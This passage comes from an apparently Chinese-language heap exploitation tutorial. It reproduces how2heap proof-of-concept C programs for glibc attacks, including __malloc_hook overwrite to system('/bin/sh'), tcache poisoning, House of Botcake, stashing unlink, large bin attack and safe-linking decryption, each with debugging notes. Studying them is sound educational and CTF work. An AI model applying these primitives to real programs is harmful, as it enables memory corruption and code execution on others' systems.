Note: In a real attack, this would be where the last 8 bits of brute forcing\n\
comes from.\n");
malloc_hook_chunk[19] = system_addr & 0xff; // The first 12 bits are static (per version).

malloc_hook_chunk[20] = (system_addr >> 8) & 0xff; // The last 4 bits of this must be brute forced (done previously already).
malloc_hook_chunk[21] = (system_addr >> 16) & 0xff; // The last byte is the remaining 8 bits that must be brute forced.
malloc_hook_chunk[22] = (system_addr >> 24) & 0xff; // If the gap is between the data and text section is super wide, this is also needed. Just putting this in to be safe.

// Trigger the malloc call for code execution via the system call being ran from the __malloc_hook.
// In a real example, you would probably want to use a one_gadget.
// But, to keep things portable, we will just use system and add a pointer to /bin/sh as the parameter
// Although this is kind of cheating (the binary is PIE), if the binary was not PIE having a pointer into the .bss section would work without a single leak.
// To get the system address (eariler on for consistency), the binary must be PIE though. So, the address is put in here.
puts("Pop Shell!");
malloc((long long)shell);
}

调试

部署如上chunk,从上到下分别为fastbin_victimobstructmain_arena_userelative_offset_heap

main_arena_use放进unsorted_bin

再次申请0x70大小的chunk: fake_libc_chunk,拆分main_arena_use

利用fake_libc_chunk中保存的libc地址和固定偏移glibc_2.23为0xe8(每个版本基本都不同)计算出__malloc_hook地址。

依次释放relative_offset_heapfastbin_victim

fastbin_victimfd指针的末尾两位改为0,那么将会把fake_libc_chunk链接进fastbinY[5](0x70)中。

glibc_2.23版本在__malloc_hook-0x23处存在0x7f大小的fake_fast,我们将fake_libc_chunkfd指针指向fake_fast_malloc_hook

申请30x70大小的chunk,可以将fake_fast_malloc_hook申请出来。



因为__malloc_hooksystem的地址差异较大,需要更改的字节较多,所以我们通过unsorted_bin attack(前文有介绍,不再赘述)将其改为main_arena + 0x58处的地址,再将其改为system地址即可。

19(0x13,也就是 0x23-0x8_fd-0x8_bk)处开始按字节写入后system几位地址 ,再去"malloc("/bin/sh\x00")"即可getshell

源码

#include <stdlib.h>
#include <stdio.h>
#include <assert.h>

/*
Technique should work on all versions of GLibC
Compile: `gcc mmap_overlapping_chunks.c -o mmap_overlapping_chunks -g`

POC written by POC written by Maxwell Dulin (Strikeout)
*/
int main(){
/*
A primer on Mmap chunks in GLibC
==================================
In GLibC, there is a point where an allocation is so large that malloc
decides that we need a seperate section of memory for it, instead
of allocating it on the normal heap. This is determined by the mmap_threshold var.
Instead of the normal logic for getting a chunk, the system call *Mmap* is
used. This allocates a section of virtual memory and gives it back to the user.

Similarly, the freeing process is going to be different. Instead
of a free chunk being given back to a bin or to the rest of the heap,
another syscall is used: *Munmap*. This takes in a pointer of a previously
allocated Mmap chunk and releases it back to the kernel.

Mmap chunks have special bit set on the size metadata: the second bit. If this
bit is set, then the chunk was allocated as an Mmap chunk.

Mmap chunks have a prev_size and a size. The *size* represents the current
size of the chunk. The *prev_size* of a chunk represents the left over space
from the size of the Mmap chunk (not the chunks directly belows size).
However, the fd and bk pointers are not used, as Mmap chunks do not go back
into bins, as most heap chunks in GLibC Malloc do. Upon freeing, the size of
the chunk must be page-aligned.

The POC below is essentially an overlapping chunk attack but on mmap chunks.
This is very similar to https://github.com/shellphish/how2heap/blob/master/glibc_2.26/overlapping_chunks.c.
The main difference is that mmapped chunks have special properties and are
handled in different ways, creating different attack scenarios than normal
overlapping chunk attacks. There are other things that can be done,
such as munmapping system libraries, the heap itself and other things.
This is meant to be a simple proof of concept to demonstrate the general
way to perform an attack on an mmap chunk.

For more information on mmap chunks in GLibC, read this post:
http://tukan.farm/2016/07/27/munmap-madness/
*/

int* ptr1 = malloc(0x10);

printf("This is performing an overlapping chunk attack but on extremely large chunks (mmap chunks).\n");
printf("Extremely large chunks are special because they are allocated in their own mmaped section\n");
printf("of memory, instead of being put onto the normal heap.\n");
puts("=======================================================\n");
printf("Allocating three extremely large heap chunks of size 0x100000 \n\n");

long long* top_ptr = malloc(0x100000);
printf("The first mmap chunk goes directly above LibC: %p\n",top_ptr);

// After this, all chunks are allocated downwards in memory towards the heap.
long long* mmap_chunk_2 = malloc(0x100000);
printf("The second mmap chunk goes below LibC: %p\n", mmap_chunk_2);

long long* mmap_chunk_3 = malloc(0x100000);
printf("The third mmap chunk goes below the second mmap chunk: %p\n", mmap_chunk_3);

printf("\nCurrent System Memory Layout \n" \
"================================================\n" \
"running program\n" \
"heap\n" \
"....\n" \
"third mmap chunk\n" \
"second mmap chunk\n" \
"LibC\n" \
"....\n" \
"ld\n" \
"first mmap chunk\n"
"===============================================\n\n" \
);

printf("Prev Size of third mmap chunk: 0x%llx\n", mmap_chunk_3[-2]);
printf("Size of third mmap chunk: 0x%llx\n\n", mmap_chunk_3[-1]);

printf("Change the size of the third mmap chunk to overlap with the second mmap chunk\n");
printf("This will cause both chunks to be Munmapped and given back to the system\n");
printf("This is where the vulnerability occurs; corrupting the size or prev_size of a chunk\n");

// Vulnerability!!! This could be triggered by an improper index or a buffer overflow from a chunk further below.
// Additionally, this same attack can be used with the prev_size instead of the size.
mmap_chunk_3[-1] = (0xFFFFFFFFFD & mmap_chunk_3[-1]) + (0xFFFFFFFFFD & mmap_chunk_2[-1]) | 2;
printf("New size of third mmap chunk: 0x%llx\n", mmap_chunk_3[-1]);
printf("Free the third mmap chunk, which munmaps the second and third chunks\n\n");

/*
This next call to free is actually just going to call munmap on the pointer we are passing it.
The source code for this can be found at https://elixir.bootlin.com/glibc/glibc-2.26/source/malloc/malloc.c#L2845

With normal frees the data is still writable and readable (which creates a use after free on
the chunk). However, when a chunk is munmapped, the memory is given back to the kernel. If this
data is read or written to, the program crashes.

Because of this added restriction, the main goal is to get the memory back from the system
to have two pointers assigned to the same location.
*/
// Munmaps both the second and third pointers
free(mmap_chunk_3);

/*
Would crash, if on the following:
mmap_chunk_2[0] = 0xdeadbeef;
This is because the memory would not be allocated to the current program.
*/

/*
Allocate a very large chunk with malloc. This needs to be larger than
the previously freed chunk because the mmapthreshold has increased to 0x202000.
If the allocation is not larger than the size of the largest freed mmap
chunk then the allocation will happen in the normal section of heap memory.
*/
printf("Get a very large chunk from malloc to get mmapped chunk\n");
printf("This should overlap over the previously munmapped/freed chunks\n");
long long* overlapping_chunk = malloc(0x300000);
printf("Overlapped chunk Ptr: %p\n", overlapping_chunk);
printf("Overlapped chunk Ptr Size: 0x%llx\n", overlapping_chunk[-1]);

// Gets the distance between the two pointers.
int distance = mmap_chunk_2 - overlapping_chunk;
printf("Distance between new chunk and the second mmap chunk (which was munmapped): 0x%x\n", distance);
printf("Value of index 0 of mmap chunk 2 prior to write: %llx\n", mmap_chunk_2[0]);

// Set the value of the overlapped chunk.
printf("Setting the value of the overlapped chunk\n");
overlapping_chunk[distance] = 0x1122334455667788;

// Show that the pointer has been written to.
printf("Second chunk value (after write): 0x%llx\n", mmap_chunk_2[0]);
printf("Overlapped chunk value: 0x%llx\n\n", overlapping_chunk[distance]);
printf("Boom! The new chunk has been overlapped with a previous mmaped chunk\n");
assert(mmap_chunk_2[0] == overlapping_chunk[distance]);
}

调试

首先申请三个0x100000大小的mmap_chunk,分别为top_ptrmmap_chunk_2mmap_chunk_3,第一个top_ptr位于libc.so上方。


接下来将mmap_chunk_3size改为202002,因为mmap_chunk_3位于mmap_chunk_2低地址处,所以mmap_chunk_3现在的size大小包含了mmap_chunk_2,与2取与运算是为了将IS_MMAP位置为1

接下来free(mmap_chunk_3)。再次申请0x300000大小的overlapping_chunkmmap_chunk_2被包含在了overlapping_chunk中。



我们可以通过overlapping_chunk去修改mmap_chunk_2的内容。


第五部分

第五部分开始使用ubuntu:18.04编译。Tcache基础请看Tcache安全机制及赛题详细解析(gundam && House of Atum)(https://bbs.kanxue.com/thread-278105.htm)。

源码

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <assert.h>

const size_t allocsize = 0x40;

int main(){
setbuf(stdout, NULL);

printf(
"\n"
"This attack is intended to have a similar effect to the unsorted_bin_attack,\n"
"except it works with a small allocation size (allocsize <= 0x78).\n"
"The goal is to set things up so that a call to malloc(allocsize) will write\n"
"a large unsigned value to the stack.\n\n"
);

// Allocate 14 times so that we can free later.
char* ptrs[14];
size_t i;
for (i = 0; i < 14; i++) {
ptrs[i] = malloc(allocsize);
}

printf(
"First we need to free(allocsize) at least 7 times to fill the tcache.\n"
"(More than 7 times works fine too.)\n\n"
);

// Fill the tcache.
for (i = 0; i < 7; i++) {
free(ptrs[i]);
}

char* victim = ptrs[7];
printf(
"The next pointer that we free is the chunk that we're going to corrupt: %p\n"
"It doesn't matter if we corrupt it now or later. Because the tcache is\n"
"already full, it will go in the fastbin.\n\n",
victim
);
free(victim);

printf(
"Next we need to free between 1 and 6 more pointers. These will also go\n"
"in the fastbin. If the stack address that we want to overwrite is not zero\n"
"then we need to free exactly 6 more pointers, otherwise the attack will\n"
"cause a segmentation fault. But if the value on the stack is zero then\n"
"a single free is sufficient.\n\n"
);

// Fill the fastbin.
for (i = 8; i < 14; i++) {
free(ptrs[i]);
}

// Create an array on the stack and initialize it with garbage.
size_t stack_var[6];
memset(stack_var, 0xcd, sizeof(stack_var));

printf(
"The stack address that we intend to target: %p\n"
"It's current value is %p\n",
&stack_var[2],
(char*)stack_var[2]
);

printf(
"Now we use a vulnerability such as a buffer overflow or a use-after-free\n"
"to overwrite the next pointer at address %p\n\n",
victim
);

//------------VULNERABILITY-----------

// Overwrite linked list pointer in victim.
*(size_t**)victim = &stack_var[0];

//------------------------------------

printf(
"The next step is to malloc(allocsize) 7 times to empty the tcache.\n\n"
);

// Empty tcache.
for (i = 0; i < 7; i++) {
ptrs[i] = malloc(allocsize);
}

printf(
"Let's just print the contents of our array on the stack now,\n"
"to show that it hasn't been modified yet.\n\n"
);

for (i = 0; i < 6; i++) {
printf("%p: %p\n", &stack_var[i], (char*)stack_var[i]);
}

printf(
"\n"
"The next allocation triggers the stack to be overwritten. The tcache\n"
"is empty, but the fastbin isn't, so the next allocation comes from the\n"
"fastbin. Also, 7 chunks from the fastbin are used to refill the tcache.\n"
"Those 7 chunks are copied in reverse order into the tcache, so the stack\n"
"address that we are targeting ends up being the first chunk in the tcache.\n"
"It contains a pointer to the next chunk in the list, which is why a heap\n"
"pointer is written to the stack.\n"
"\n"
"Earlier we said that the attack will also work if we free fewer than 6\n"
"extra pointers to the fastbin, but only if the value on the stack is zero.\n"
"That's because the value on the stack is treated as a next pointer in the\n"
"linked list and it will trigger a crash if it isn't a valid pointer or null.\n"
"\n"
"The contents of our array on the stack now look like this:\n\n"
);

malloc(allocsize);

for (i = 0; i < 6; i++) {
printf("%p: %p\n", &stack_var[i], (char*)stack_var[i]);
}

char *q = malloc(allocsize);
printf(
"\n"
"Finally, if we malloc one more time then we get the stack address back: %p\n",
q
);

assert(q == (char *)&stack_var[2]);

return 0;
}

调试

首先申请14chunk,先后将tcachefastbinY[4]填满。其中victim指向第8chunk也就是fastbinY[4]的最后一个chunk_ptrs[7]

victim(ptrs[7]_fd)指向stack_var[0]的位置,然后将tcache清空。

这次malloc将会先从fastbin头部取出一个chunk,然后把fastbin清空,放入tcache中,因为fastbin取出时从头开始,tcache又是FIFO结构, 所以放入tcache是倒序的,把stack_var也算做了一个chunk,所以是满7个。

此时再去申请一个0x50大小的chunk将会把stack_var取出来,此时q == stack_var[2]

libc-2.29新增加double free检查,方法是在tcache_entry结构体中新增加标志位key来检查chunk是否在tcache bin中。当free掉一个堆块进入tcache时,假如堆块的bk位存放的key == tcache_key, 就会遍历这个大小的Tcache,假如发现同地址的堆块,则触发double Free报错。因为chunkkey保存在bk位置,只需将其修改即可绕过double free检查。而house_of_botcake是另一种方法。

源码

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <assert.h>

int main()
{
/*
* This attack should bypass the restriction introduced in
* https://sourceware.org/git/?p=glibc.git;a=commit;h=bcdaad21d4635931d1bd3b54a7894276925d081d
* If the libc does not include the restriction, you can simply double free the victim and do a
* simple tcache poisoning
* And thanks to @anton00b and @subwire for the weird name of this technique */

// disable buffering so _IO_FILE does not interfere with our heap
setbuf(stdin, NULL);
setbuf(stdout, NULL);

// introduction
puts("This file demonstrates a powerful tcache poisoning attack by tricking malloc into");
puts("returning a pointer to an arbitrary location (in this demo, the stack).");
puts("This attack only relies on double free.\n");

// prepare the target
intptr_t stack_var[4];
puts("The address we want malloc() to return, namely,");
printf("the target address is %p.\n\n", stack_var);

// prepare heap layout
puts("Preparing heap layout");
puts("Allocating 7 chunks(malloc(0x100)) for us to fill up tcache list later.");
intptr_t *x[7];
for(int i=0; i<sizeof(x)/sizeof(intptr_t*); i++){
x[i] = malloc(0x100);
}
puts("Allocating a chunk for later consolidation");
intptr_t *prev = malloc(0x100);
puts("Allocating the victim chunk.");
intptr_t *a = malloc(0x100);
printf("malloc(0x100): a=%p.\n", a);
puts("Allocating a padding to prevent consolidation.\n");
malloc(0x10);

// cause chunk overlapping
puts("Now we are able to cause chunk overlapping");
puts("Step 1: fill up tcache list");
for(int i=0; i<7; i++){
free(x[i]);
}
puts("Step 2: free the victim chunk so it will be added to unsorted bin");
free(a);

puts("Step 3: free the previous chunk and make it consolidate with the victim chunk.");
free(prev);

puts("Step 4: add the victim chunk to tcache list by taking one out from it and free victim again\n");
malloc(0x100);
/*VULNERABILITY*/
free(a);// a is already freed
/*VULNERABILITY*/

// simple tcache poisoning
puts("Launch tcache poisoning");
puts("Now the victim is contained in a larger freed chunk, we can do a simple tcache poisoning by using overlapped chunk");
intptr_t *b = malloc(0x120);
puts("We simply overwrite victim's fwd pointer");
b[0x120/8-2] = (long)stack_var;

// take target out
puts("Now we can cash out the target chunk.");
malloc(0x100);
intptr_t *c = malloc(0x100);
printf("The new chunk is at %p\n", c);

// sanity check
assert(c==stack_var);
printf("Got control on target/stack!\n\n");

// note
puts("Note:");
puts("And the wonderful thing about this exploitation is that: you can free b, victim again and modify the fwd pointer of victim");
puts("In that case, once you have done this exploitation, you can have many arbitary writes very easily.");

return 0;
}

调试



首先申请9non-fast_chunk和一个obstruct-chunk,将tcache填满,剩余两个放入unsorted_bin,因为aprev相邻,所以会被整合在一起。

tcache头部取出一个chunk,然后再次free(a),此时chunk_a同时出现在了unsorted_bintcache中。



此时申请0x120大小的chunkunsorted_bin中包含chunk_a_fdchunk申请出来,我们就可以修改tcachechunk_a的下一个链接进来的chunk为我们伪造的chunk,在申请两次用户区为0x100大小的chunk就可以将我们伪造的chunk申请出来。

源码

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

int main()
{
setbuf(stdout, NULL);

printf("This file demonstrates the house of spirit attack on tcache.\n");
printf("It works in a similar way to original house of spirit but you don't need to create fake chunk after the fake chunk that will be freed.\n");
printf("You can see this in malloc.c in function _int_free that tcache_put is called without checking if next chunk's size and prev_inuse are sane.\n");
printf("(Search for strings \"invalid next size\" and \"double free or corruption\")\n\n");

printf("Ok. Let's start with the example!.\n\n");

printf("Calling malloc() once so that it sets up its memory.\n");
malloc(1);

printf("Let's imagine we will overwrite 1 pointer to point to a fake chunk region.\n");
unsigned long long *a; //pointer that will be overwritten
unsigned long long fake_chunks[10]; //fake chunk region

printf("This region contains one fake chunk. It's size field is placed at %p\n", &fake_chunks[1]);

printf("This chunk size has to be falling into the tcache category (chunk.size <= 0x410; malloc arg <= 0x408 on x64). The PREV_INUSE (lsb) bit is ignored by free for tcache chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
printf("... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
fake_chunks[1] = 0x40; // this is the size

printf("Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
printf("... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");

a = &fake_chunks[2];

printf("Freeing the overwritten pointer.\n");
free(a);

printf("Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
void *b = malloc(0x30);
printf("malloc(0x30): %p\n", b);

assert((long)b == (long)&fake_chunks[2]);
}

调试




这种利用能够方法很简单,只需要将fake_chunks_size=0x40,然后free(fake_chunk)即可将其放入到tcache中,再去申请0x30大小的chunk即可将其申请出来。

源码

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <assert.h>

int main()
{
// disable buffering
setbuf(stdin, NULL);
setbuf(stdout, NULL);

printf("This file demonstrates a simple tcache poisoning attack by tricking malloc into\n"
"returning a pointer to an arbitrary location (in this case, the stack).\n"
"The attack is very similar to fastbin corruption attack.\n");
printf("After the patch https://sourceware.org/git/?p=glibc.git;a=commit;h=77dc0d8643aa99c92bf671352b0a8adde705896f,\n"
"We have to create and free one more chunk for padding before fd pointer hijacking.\n\n");

size_t stack_var;
printf("The address we want malloc() to return is %p.\n", (char *)&stack_var);

printf("Allocating 2 buffers.\n");
intptr_t *a = malloc(128);
printf("malloc(128): %p\n", a);
intptr_t *b = malloc(128);
printf("malloc(128): %p\n", b);

printf("Freeing the buffers...\n");
free(a);
free(b);

printf("Now the tcache list has [ %p -> %p ].\n", b, a);
printf("We overwrite the first %lu bytes (fd/next pointer) of the data at %p\n"
"to point to the location to control (%p).\n", sizeof(intptr_t), b, &stack_var);
b[0] = (intptr_t)&stack_var;
printf("Now the tcache list has [ %p -> %p ].\n", b, &stack_var);

printf("1st malloc(128): %p\n", malloc(128));
printf("Now the tcache list has [ %p ].\n", &stack_var);

intptr_t *c = malloc(128);
printf("2nd malloc(128): %p\n", c);
printf("We got the control\n");

assert((long)&stack_var == (long)c);
return 0;
}

调试

申请同样大小的a,b两个chunk,并将其放在tcache中。然后将后进入的chunk_b_fd改为stack_var_fd,这样就能将其链接进tcachetcache的数量为2,可以申请两个chunk出来。在2.29以后,如果tcache的数量为0,就算tcache中有free_chunk也不会将其取出来,所以我们确保tcache的数量为2,这样就能取出两个chunk

利用calloc可以越过tcachechunk的特点结合house of lore进行的攻击手段,可以向任意地址写入任意值,也可以申请任意地址。

源码

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

int main(){
unsigned long stack_var[0x10] = {0};
unsigned long *chunk_lis[0x10] = {0};
unsigned long *target;

setbuf(stdout, NULL);

printf("This file demonstrates the stashing unlink attack on tcache.\n\n");
printf("This poc has been tested on both glibc 2.27 and glibc 2.29.\n\n");
printf("This technique can be used when you are able to overwrite the victim->bk pointer. Besides, it's necessary to alloc a chunk with calloc at least once. Last not least, we need a writable address to bypass check in glibc\n\n");
printf("The mechanism of putting smallbin into tcache in glibc gives us a chance to launch the attack.\n\n");
printf("This technique allows us to write a libc addr to wherever we want and create a fake chunk wherever we need. In this case we'll create the chunk on the stack.\n\n");

// stack_var emulate the fake_chunk we want to alloc to
printf("Stack_var emulates the fake chunk we want to alloc to.\n\n");
printf("First let's write a writeable address to fake_chunk->bk to bypass bck->fd = bin in glibc. Here we choose the address of stack_var[2] as the fake bk. Later we can see *(fake_chunk->bk + 0x10) which is stack_var[4] will be a libc addr after attack.\n\n");

stack_var[3] = (unsigned long)(&stack_var[2]);

printf("You can see the value of fake_chunk->bk is:%p\n\n",(void*)stack_var[3]);
printf("Also, let's see the initial value of stack_var[4]:%p\n\n",(void*)stack_var[4]);
printf("Now we alloc 9 chunks with malloc.\n\n");

//now we malloc 9 chunks
for(int i = 0;i < 9;i++){
chunk_lis[i] = (unsigned long*)malloc(0x90);
}

//put 7 chunks into tcache
printf("Then we free 7 of them in order to put them into tcache. Carefully we didn't free a serial of chunks like chunk2 to chunk9, because an unsorted bin next to another will be merged into one after another malloc.\n\n");

for(int i = 3;i < 9;i++){
free(chunk_lis[i]);
}

printf("As you can see, chunk1 & [chunk3,chunk8] are put into tcache bins while chunk0 and chunk2 will be put into unsorted bin.\n\n");

//last tcache bin
free(chunk_lis[1]);
//now they are put into unsorted bin
free(chunk_lis[0]);
free(chunk_lis[2]);

//convert into small bin
printf("Now we alloc a chunk larger than 0x90 to put chunk0 and chunk2 into small bin.\n\n");

malloc(0xa0);// size > 0x90

//now 5 tcache bins
printf("Then we malloc two chunks to spare space for small bins. After that, we now have 5 tcache bins and 2 small bins\n\n");

malloc(0x90);
malloc(0x90);

printf("Now we emulate a vulnerability that can overwrite the victim->bk pointer into fake_chunk addr: %p.\n\n",(void*)stack_var);

//change victim->bck
/*VULNERABILITY*/
chunk_lis[2][1] = (unsigned long)stack_var;
/*VULNERABILITY*/

//trigger the attack
printf("Finally we alloc a 0x90 chunk with calloc to trigger the attack. The small bin preiously freed will be returned to user, the other one and the fake_chunk were linked into tcache bins.\n\n");

calloc(1,0x90);

printf("Now our fake chunk has been put into tcache bin[0xa0] list. Its fd pointer now point to next free chunk: %p and the bck->fd has been changed into a libc addr: %p\n\n",(void*)stack_var[2],(void*)stack_var[4]);

//malloc and return our fake chunk on stack
target = malloc(0x90);

printf("As you can see, next malloc(0x90) will return the region our fake chunk: %p\n",(void*)target);

assert(target == &stack_var[2]);
return 0;
}

基础知识

#if USE_TCACHE //如果程序启用了Tcache
/* While we're here, if we see other chunks of the same size,
stash them in the tcache. */
//遍历整个smallbin,获取相同size的free chunk
size_t tc_idx = csize2tidx (nb);
if (tcache && tc_idx < mp_.tcache_bins)
{
mchunkptr tc_victim;
/* While bin not empty and tcache not full, copy chunks over. */
//判定Tcache的size链表是否已满,并且取出smallbin的末尾Chunk。
//验证取出的Chunk是否为Bin本身(Smallbin是否已空)
while ( tcache->counts[tc_idx] < mp_.tcache_count
&& (tc_victim = last (bin) ) != bin)
{
//如果成功获取了Chunk
if (tc_victim != 0)
{
// 获取 small bin 中倒数第二个 chunk 。
bck = tc_victim->bk;
//设置标志位
set_inuse_bit_at_offset (tc_victim, nb);
// 如果不是 main_arena,设置对应的标志
if (av != &main_arena)
set_non_main_arena (tc_victim);
//取出最后一个Chunk
bin->bk = bck;
bck->fd = bin;
//将其放入到Tcache中
tcache_put (tc_victim, tc_idx);
}
}
}
#endif

可以看到,这种攻击手段并没有经过house of lore的需要经过的验证,即没有这一个要求bck->fd == victim

调试

目标地址的stack_var_bk == stack_var_fd,为了后续将fake_chunkbk指针指向一块可写的内存,绕过glibc在摘链表时候的检查,样例中我们在small_bin中摘取两个chunk放入tcachetcache便已经满了,不会再去索取fake_chunk_bk

申请90x90大小的chunk,将3~86chunk放进tcache中, 然后依次释放1,0,2三个chunk1将会进入tcache中,0,2进入unsorted,因为不相邻,所以不会触发合并。

malloc(0xa0)将会触发整理机制,将unsorted_bin中的chunk放进small_bin

接下来在tcache中腾出两个位置,为后续放入small_bin chunk做准备。

small_bin中倒数第二个chunk_bk指向stack_var,为后续将chunk放入tcache中做索引。

利用calloc(1,0x90)small_bin中最后一个chunk拿出来,然后触发整理机制,将small_bin中剩余的chunk倒序取出放入tcache,也就是按bk去索引。

此时再次申请将会把目标地址的fake_chunk申请出来。


第六部分

本次使用ubuntu:20.04

源码

#include<stdio.h>
#include<stdlib.h>
#include<assert.h>

/*

A revisit to large bin attack for after glibc2.30

Relevant code snippet :

if ((unsigned long) (size) < (unsigned long) chunksize_nomask (bck->bk)){
fwd = bck;
bck = bck->bk;
victim->fd_nextsize = fwd->fd;
victim->bk_nextsize = fwd->fd->bk_nextsize;
fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
}

*/

int main(){
/*Disable IO buffering to prevent stream from interfering with heap*/
setvbuf(stdin,NULL,_IONBF,0);
setvbuf(stdout,NULL,_IONBF,0);
setvbuf(stderr,NULL,_IONBF,0);

printf("\n\n");
printf("Since glibc2.30, two new checks have been enforced on large bin chunk insertion\n\n");
printf("Check 1 : \n");
printf("> if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))\n");
printf("> malloc_printerr (\"malloc(): largebin double linked list corrupted (nextsize)\");\n");
printf("Check 2 : \n");
printf("> if (bck->fd != fwd)\n");
printf("> malloc_printerr (\"malloc(): largebin double linked list corrupted (bk)\");\n\n");
printf("This prevents the traditional large bin attack\n");
printf("However, there is still one possible path to trigger large bin attack. The PoC is shown below : \n\n");

printf("====================================================================\n\n");

size_t target = 0;
printf("Here is the target we want to overwrite (%p) : %lu\n\n",&target,target);
size_t *p1 = malloc(0x428);
printf("First, we allocate a large chunk [p1] (%p)\n",p1-2);
size_t *g1 = malloc(0x18);
printf("And another chunk to prevent consolidate\n");

printf("\n");

size_t *p2 = malloc(0x418);
printf("We also allocate a second large chunk [p2] (%p).\n",p2-2);
printf("This chunk should be smaller than [p1] and belong to the same large bin.\n");
size_t *g2 = malloc(0x18);
printf("Once again, allocate a guard chunk to prevent consolidate\n");

printf("\n");

free(p1);
printf("Free the larger of the two --> [p1] (%p)\n",p1-2);
size_t *g3 = malloc(0x438);
printf("Allocate a chunk larger than [p1] to insert [p1] into large bin\n");

printf("\n");

free(p2);
printf("Free the smaller of the two --> [p2] (%p)\n",p2-2);
printf("At this point, we have one chunk in large bin [p1] (%p),\n",p1-2);
printf(" and one chunk in unsorted bin [p2] (%p)\n",p2-2);

printf("\n");

p1[3] = (size_t)((&target)-4);
printf("Now modify the p1->bk_nextsize to [target-0x20] (%p)\n",(&target)-4);

printf("\n");

size_t *g4 = malloc(0x438);
printf("Finally, allocate another chunk larger than [p2] (%p) to place [p2] (%p) into large bin\n", p2-2, p2-2);
printf("Since glibc does not check chunk->bk_nextsize if the new inserted chunk is smaller than smallest,\n");
printf(" the modified p1->bk_nextsize does not trigger any error\n");
printf("Upon inserting [p2] (%p) into largebin, [p1](%p)->bk_nextsize->fd_nextsize is overwritten to address of [p2] (%p)\n", p2-2, p1-2, p2-2);

printf("\n");

printf("In out case here, target is now overwritten to address of [p2] (%p), [target] (%p)\n", p2-2, (void *)target);
printf("Target (%p) : %p\n",&target,(size_t*)target);

printf("\n");
printf("====================================================================\n\n");

assert((size_t)(p2-2) == target);

return 0;
}

基础知识

glibc-2.30新增了两道检查:

// largebin_chunk->bk_nextsize->fd_nextszie != largebin_chunk
if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");
// largebin_chunk->bk->fd != largebin_chunk
if (bck->fd != fwd)
malloc_printerr ("malloc(): largebin double linked list corrupted (bk)");

利用代码:

if ((unsigned long) (size) < (unsigned long) chunksize_nomask (bck->bk)) {
fwd = bck;
bck = bck->bk;
victim->fd_nextsize = fwd->fd;
victim->bk_nextsize = fwd->fd->bk_nextsize;
fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
}

调试

布置堆结构如上,图中从上到下chunk分别为p1, g1, p2, g2

chunk_p1放进largebin,将chunk_p2放进unsorted_bin(largebin)p1_size > (unsorted)p2_size

修改p1_bk_nextsize = target-0x20,也就是fake_chunk_fd_nextsize

然后申请0x438大小的chunk,触发整理机制将chunk_p2链接进largebin,因为p2_size < (largebin_least)p1,会触发如下代码。

// victim:p2, fwd:largebin表头, bck:largebin_least_chunk(p1)
if ((unsigned long) (size) < (unsigned long) chunksize_nomask (bck->bk)) {
fwd = bck;
bck = bck->bk;
victim->fd_nextsize = fwd->fd;
victim->bk_nextsize = fwd->fd->bk_nextsize;
fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
}

1.p2->fd_nextsize = p1;

2.p2->bk_nextsize = (target-0x20)p1->bk_nextsize;

3.(target-0x20)p1->bk_nextsize = target = p2;

第三步时将(target)fake_chunk_fd_nextsize改为了p2_prev

最后目标地址被成功修改为一个大数。写大数的行为,可以用来修改global_max_fast

本次使用ubuntu:22.04进行编译。

源码

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

long decrypt(long cipher)
{
puts("The decryption uses the fact that the first 12bit of the plaintext (the fwd pointer) is known,");
puts("because of the 12bit sliding.");
puts("And the key, the ASLR value, is the same with the leading bits of the plaintext (the fwd pointer)");
long key = 0;
long plain;

for(int i=1; i<6; i++) {
int bits = 64-12*i;
if(bits < 0) bits = 0;
plain = ((cipher ^ key) >> bits) << bits;
key = plain >> 12;
printf("round %d:\n", i);
printf("key: %#016lx\n", key);
printf("plain: %#016lx\n", plain);
printf("cipher: %#016lx\n\n", cipher);
}
return plain;
}

int main()
{
/*
* This technique demonstrates how to recover the original content from a poisoned
* value because of the safe-linking mechanism.
* The attack uses the fact that the first 12 bit of the plaintext (pointer) is known
* and the key (ASLR slide) is the same to the pointer's leading bits.
* As a result, as long as the chunk where the pointer is stored is at the same page
* of the pointer itself, the value of the pointer can be fully recovered.
* Otherwise, we can also recover the pointer with the page-offset between the storer
* and the pointer. What we demonstrate here is a special case whose page-offset is 0.
* For demonstrations of other more general cases, plz refer to
* https://github.com/n132/Dec-Safe-Linking
*/

setbuf(stdin, NULL);
setbuf(stdout, NULL);

// step 1: allocate chunks
long *a = malloc(0x20);
long *b = malloc(0x20);
printf("First, we create chunk a @ %p and chunk b @ %p\n", a, b);
malloc(0x10);
puts("And then create a padding chunk to prevent consolidation.");

// step 2: free chunks
puts("Now free chunk a and then free chunk b.");
free(a);
free(b);
printf("Now the freelist is: [%p -> %p]\n", b, a);
printf("Due to safe-linking, the value actually stored at b[0] is: %#lx\n", b[0]);

// step 3: recover the values
puts("Now decrypt the poisoned value");
long plaintext = decrypt(b[0]);

printf("value: %p\n", a);
printf("recovered value: %#lx\n", plaintext);
assert(plaintext == (long)a);
}

基础知识

tcache_next(fd)新增检查:

// 加密
#define PROTECT_PTR(pos, ptr) \
((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
// 解密
#define REVEAL_PTR(ptr) PROTECT_PTR (&ptr, ptr)
/*
* 原理: A:fd;B:(pos>>12);C:(ptr); A=B^C; C=A^B;
*/

P表示将保存在空闲块的fd字段中的指针值。L表示fd字段本身的地址。L>>12L的右移值,用于对P进行异或运算,从而产生一个编码指针P'Safe Linking将这个P'值存储在fd字段中。



